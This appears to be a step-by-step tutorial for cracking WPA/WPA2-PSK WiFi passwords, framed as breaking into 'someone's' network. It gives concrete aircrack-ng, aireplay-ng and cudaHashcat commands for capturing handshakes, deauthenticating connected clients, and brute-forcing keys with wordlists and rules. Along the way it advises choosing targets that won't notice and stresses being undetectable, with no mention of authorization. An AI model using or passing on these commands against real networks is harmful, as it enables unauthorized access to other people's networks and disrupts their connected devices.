Breaking a WiFi network (WPA(2)-PSK) depends on the strength of the password. There are plenty of guides on breaking WEP/WPA/WPA2 on the net, but we'll repeat it all here anyway.
- A linux distro (possibly Kali) which you can boot into.
- A WiFi Card/Dongle which supports Monitor Mode under linux.
- Proximity to your target network - You'll need a bar or two of Wifi signal to have any fun.
- aircrack-ng - preinstalled in Kali, available in most linux distros.
The basic process of cracking someone's Wifi is:
- Find their network.
- Listen for a client to connect to the network.
- Crack the key.
Finding the network
Your standard WiFi connection softare (netctl, wicd, etc) can tell you what networks are available. Alternatively you scan manually:
Find your wifi card. We'll assume it's wlan0.
Turn on the wifi card/dongle
# ifconfig wlan0 up
List available wifi access points. You may want to pipe this command to less or a file.
# iwlist scan wlan0
Look through the output of
iwlist to see what networks are around, then take note of the network's channel and mac address.
Listen to the Network
Once you have a target wifi and know it's channel and MAC address:
# airmon-ng start wlan0 <channel>
This sets your wifi card to monitor mode and creates the wlan0mon interface which we'll use with the following programs:
# airodump -c <channel> --bssid <mac of AP> -w prefix wlan0mon
airodump command dumps all the packets it hears into a file, given that
-cis the channel e.g.
--bssidis the MAC address of the wifi access point e.g.
-wis a prefix for the files that airodump will product e.g.
wlan0monis the monitor device we created with
Wait for client authentication
At this point your Wifi card is listening to every packet sent on the target Wifi network. What we're looking for is the authentication handshake, which is basically a hashed password which we'll attempt to crack once we have it.
In the top right of the terminal there will be a message about a handshake being read once it happens, and then we can stop listening. This is a client connecting to the target wifi.
Think about what kind of network your target is and when people would connect to it - 9am ready for work? 6pm home at last? When will a client connect? Alternatively, we can just kick off a client that's already connected...
Kicking Off a Client
If you're impatient, you can attempt to kick a client off the target wifi network. For this, you'll need a client to be connected to the network, and be physically close enough to that client to send some spoofed packets to it.
The output of
airodump-ng will let you know if there are clients connected to your target network. Checking the
<prefix>.kismet.netxml file will give you clues as to what kinds of devices are on the network. Kicking off an Apple device might get someone's attention. Kicking off an Epson printer probably wont.
To kick someone off their wifi network, send them a DEAUTH packet:
# aireplay-ng -0 1 -a <mac of AP> -c <mac of client> wlan0mon
-0is to send the deauth packet
1is to send it once.
-ais the mac address of the access point
-cis the mac address of the client connected to the access point
wlan0monis the interface created earlier
If you're close enough to the client device for them to hear you, this will kick them off the network. They will probably try to automatically reconnect. This gives us the handshake we're after.
aireplay-ng command will let you know how many ACKs (acknowledgements of your packets) were received. If you get no acknowledgements, you're probably too far away from the network and need to get physically closer.
Cracking the handshake
With the handshake acquired, you can crack it. This is done offline and (unless you kicked someone off their Wifi) at this point all you have done is listen to the airwaves and are completely undetectable.
Cracking with aircrack-ng
To crack the handshake with
aircrack-ng (cpu) run:
# aircrack-ng -w <wordlist> -b <mac of AP> prefix*.cap
-wpoints to a wordlist/dictionary. Kali has several available, run a web search for more.
-bif the mac address of the access point
prefix*.capis a file we created with
This will attempt to crack the handshake with the cpu. Quite slow. An i7 may get 4000 tries a second.
Cracking with cudaHashcat
cudaHastcat is a version of the hashcat password cracker which uses an nvidia GPU instead of a cpu. A gtx970 will get 160,000 tries a second. oclHashcat will use an AMD GPU. Hashcat uses a different filetype than aircrack-ng (.hccap instead of .cap). So the first step is to convert your .cap file to the hashcat format:
# wpaclean cleanprefix.cap prefix.cap # aircrack-ng cleanprefix.cap hashcatprefix
This will create
# cudaHastcat -m 2500 hashcatprefix.hccap wordlist
-m 2500is for cracking WPA/WPA2 hashes.
hashcatprefix.hccapis the wpa handshake in hashcat format.
wordlistis the wordlist you're using to crack the password
There is also
# cudaHastcat -m 2500 hashcatprefix.hccap wordlist -r /opt/cudaHashcat/rules/best64.rule
- Will apply the
best64.rulerules files to your wordlist. Will take much longer but may give you success.
Common Aircrack Problems
airmon-ngstart complains about processes that are using my wifi card.
# airmon-ng check kill
airmon-ngcomplains about soft blocking/rfkill.
# rfkill unblock all